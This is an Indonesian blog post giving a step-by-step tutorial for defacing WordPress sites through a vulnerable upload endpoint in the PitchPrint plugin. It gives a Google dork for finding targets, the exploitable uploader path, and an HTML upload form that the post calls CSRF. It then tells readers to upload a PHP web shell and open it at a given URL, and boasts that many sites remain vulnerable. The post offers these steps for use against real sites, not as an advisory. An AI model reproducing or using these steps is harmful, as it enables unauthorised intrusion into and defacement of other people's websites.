Kamis, 04 Agustus 2016

Tutorial Deface WP PitchPrint Vulnerable


    

   Hallo Gans skarang admin tamvan ini akan share tutor yg jos . 

Dapatnya sih dari blog teman :D , dan saya coba exploitnya trnyata masih bnyak yg vuln mas .

Tanpa basa basi langsung aja pelajari tutornya di bwah ini .

Dork : "inurl:wp-content/plugins/pitchprint/" ( tanpa tanda kutip bos )

Exploit vulnerability : /wp-content/plugins/pitchprint/uploader/

CSRF :

<form method="POST" action="contoh.com/wp-content/plugins/pitchprint/uploader/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>



     Seperti biasa gunakan dorknya menggunakan search engine (google) :v

klau sudah dapat targetnya contoh

http://semvak.com/wp-content/plugins/pitchprint/

     masukkin exploit vulnerability tadi yg ada di atas cok .

nanti tanda vulnnya kyak gini mas bro .





Klau sudah kyak gitu  mas , sisa upload Shellnya broe , pake CSRF yang tadi ada diatas .



Klau gambarnya kek gitu berarti suksek .

jdi sisa panggil shellnya gampang kyak gini mas contohnya :

http://semvak.com/wp-content/plugins/pitchprint/uploader/files/namashellkau.php



Tarararararararararararararararararar :v , mudah kan bos?


Thanks To : www.sidoarjogetar.com - FrozenBear 404 - PhantomGhost - Sulawesi IT Sec




Share this

0 Comment to "Tutorial Deface WP PitchPrint Vulnerable"

Posting Komentar